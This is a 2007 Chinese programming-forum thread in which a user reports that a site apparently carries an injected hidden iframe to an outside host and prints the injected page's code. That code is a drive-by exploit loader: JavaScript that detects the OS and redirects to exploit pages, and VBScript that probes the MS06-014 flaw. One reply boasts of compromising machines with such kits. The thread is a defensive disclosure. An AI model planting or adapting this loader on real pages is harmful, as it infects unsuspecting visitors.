主题:编程爱好者网站被挂马了
renhua
[专家分:540] 发布于 2007-06-08 11:05:00
打开页面后发现,在每个页面的<html>标签之前,都有一句:
<iframe src='http://www.hyap98.com/123/ad.htm' height='0'></iframe>
回复列表 (共9个回复)
沙发
renhua [专家分:540] 发布于 2007-06-08 11:09:00
被iframe引入的这个页面的代码:
[code]
<iframe src='http://www.hyap98.com/123/ad.htm' height='0'>
</iframe>
<script language="javascript">
window.status="";
function detectOS()
{
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
{
OS = "Windows XP";
}
else
{
if(navigator.userAgent.indexOf("Windows NT 5.2") != -1)
{OS = "Windows 2003";}
else
{OS = "Windows 2000";}
}
return OS;
}
function MakeItSo()
{
if(detectOS() == "Windows XP")
{
//操作系统为xp,执行xp的Oday网马
window.location.href="vip.htm";
}
else {if(detectOS() == "Windows 2003")
{
//操作系统为2003
window.location.href="aaa.htm";
}
else
{
//操作系统为2K,执行2K的Oday网马
window.location.href="aaa.htm";
}
}
}
</script>
<script language=VBScript>
on error resume next
aa="object"
aaa="classid"
aaaa="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
bb="Microsoft.XMLHTTP"
Set downf = document.createElement(aa)
downf.setAttribute aaa, aaaa
str=bb
Set O = downf.CreateObject(str,"")
if Not Err.Number = 0 then
err.clear
//没有MS06-014漏洞,3秒后判断操作系统类型执行不同的Oday网马
document.write("<scr"&"ipt language=""javascript"">
window.setTimeout(""MakeItSo()"",3000);</sc"&"ript>")
else
//有MS06-014漏洞,执行06-014的网马014.htm
document.write("<iframe width=""0"" height=""0"" src=""aaa.htm""></iframe>")
end if
</script>
[/code]
板凳
renhua [专家分:540] 发布于 2007-06-08 11:11:00
顺便发现新问题,论坛的这个格式很容易乱啊...
3 楼
killavp [专家分:0] 发布于 2007-06-08 12:52:00
还是0day马?
这个马马N年就出来了,他这个应该是智能判断,同时生成ms06014,017,..还有ANI吧~
反正在那是这个漏洞刚出的时候,到是抓了不少肉鸡~^_^~
现在过时了吧。。。。
4 楼
renhua [专家分:540] 发布于 2007-06-08 13:03:00
关于那页面的内容我想你得找挂马的人去讨论。
5 楼
yaozheng [专家分:28410] 发布于 2007-06-10 19:41:00
您好,我因为前两天外出旅游,没有看过网站。今天刚回来,检查了一下网站的文件,但并没有发现您说的被挂马的情况,请问您是在哪个页面看到的呢?
6 楼
renhua [专家分:540] 发布于 2007-06-10 19:53:00
你好,基本所有页面都有,首页有,下载页面有,论坛有......
瑞星会报警。
然后,我公告这个问题之后大约几个小时,页面里的这一句代码就莫名其妙的消失了。
我还以为是你悄悄的处理了呢!
既然你是今天才知道,那我想,你得好好的检查一下贵网站的安全性了。
既然有一个人能挂马,不排除有第二第三个。
到现在为止,你网站生成的html代码里,第一行依然是个空白行,<html>标签是从第二行开始的。
7 楼
renhua [专家分:540] 发布于 2007-06-10 19:55:00
btw,我就是为了发这个帖子,才注册了一个id。
因为不愿意看到一个历史还算长的不错的编程站点被谁恶意xx
8 楼
yaozheng [专家分:28410] 发布于 2007-06-10 22:54:00
是这样的,我检查了网站文件的更新记录和一些监控日志,在7日到10日的这段时间内,并未有任何网站文件被修改的记录。另外网站是有文件自动恢复程序,可以快速恢复被恶意篡改的文件,但是从该程序运行报告来看,也没有发现曾过有恢复的记录。另外也没有其他的网友报告有发现挂马情况,所以我估计可能还是虚惊一场吧,不过也谢谢您的提醒,以便我今后更加注意网站安全方面的工作。
9 楼
renhua [专家分:540] 发布于 2007-06-10 23:11:00
那只能有一种原因了,就是我上网的线路被电信强奸了。
我来回复